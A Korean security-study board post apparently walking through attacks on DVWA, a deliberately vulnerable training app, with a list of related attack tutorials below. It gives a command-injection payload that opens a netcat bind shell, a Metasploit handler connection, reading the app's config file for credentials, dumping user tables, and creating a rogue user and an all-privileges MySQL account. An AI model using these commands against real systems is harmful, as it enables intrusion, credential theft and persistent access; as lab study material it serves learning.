본문 바로가기
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files

1. Command Execution
- Execute Netcat  
;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

2. use Metasploit to access DVWA as well
msfconsole
use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.122.179
exploit
15.png
Note: Now you connoted to dvwa on port 4444.

whoami
pwd
ls -l
cat /var/www/html/dvwa/config/config.inc.php
16.png

3. db credential exploration from shell

* Show DVWA Database Information
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

* Create a new user in dvwa.users table
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

* Show Mysql table information
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD

* Create new Mysql user
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD


Title
List of Articles
번호 제목 글쓴이 날짜 조회 수
46 How to install Xplico on Kali Hojung 2014.09.29 6943
45 MITM: Ettercap (automated arp spoof) + Xplico (pcap analyzer) file Hojung 2014.09.29 6779
44 DVWA - Upload and use C99.php Backdoor shell (upload C99.php and activate) file Hojung 2014.10.04 6432
43 DoS (Denial of Service) 공격에 대해 (Ping of Death, Syn Flooding 공격/탐지/대응, Tear Drop, Smurf/Fraggle, LAND Attack) file Hojung 2014.11.02 6030
42 DVWA - Stored XSS (Cross Site Scripting) file Hojung 2014.10.04 5807
41 Cracking password protected zip files with John on OSX Hojung 2014.08.23 5534
40 DVWA - Burp Suite, Man-in-the-middle-attack (burp 사용해 cookie를 확보 후 firefox에서 cookie 조작) file Hojung 2014.10.04 5534
39 DVWA - Automated SQL Injection with SqlMap (SQLi에 사용되는 URL 및 Cookie를 가지고 자동으로 injectin) file Hojung 2014.10.04 5510
38 Session Cookie 세부항목에 대해 (secure, Http Only flag) Hojung 2015.01.06 5490
37 DVWA - Using the nikto.pl web vulnerability scanner file Hojung 2014.10.04 5243
36 DNS Spoofing from CLI (ip forwarding + arp spoofing + dns spoofing with ettercap) file Hojung 2014.10.06 5166
35 쉘코드(shell code)란 payload로 사용되는 작은 코드조각 Hojung 2014.12.23 4912
34 DHCP starvation attack by Yersinia file Hojung 2014.09.27 4636
33 brute-force HTTP/S basic access authentication with hydra file Hojung 2015.01.07 4380
32 Install WebGoat 5.3 in Kali file Hojung 2015.02.02 4365
31 Slowloris attack Hojung 2014.08.20 4203
30 DVWA - Upload PHP Backdoor Payload (PHP파일 업로드 후 web을 통해 액세스. 즉, 서버에서 php 실행됨) file Hojung 2014.10.04 4167
29 How To Install Metasploit Framework In MacOSX (homebrew, postgres) Hojung 2014.08.28 4150
28 DVWA - Manual SQL Injection and John the Ripper with sql result file Hojung 2014.10.04 4142
» DVWA - Using Metasploit with Command Execution (backdoor using nc and access from Metasploit) file Hojung 2014.10.04 3946
Board Pagination ‹ Prev 1 2 ... 3 Next ›
/ 3

Designed by sketchbooks.co.kr / sketchbook5 board skin

나눔글꼴 설치 안내


이 PC에는 나눔글꼴이 설치되어 있지 않습니다.

이 사이트를 나눔글꼴로 보기 위해서는
나눔글꼴을 설치해야 합니다.

설치 취소

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5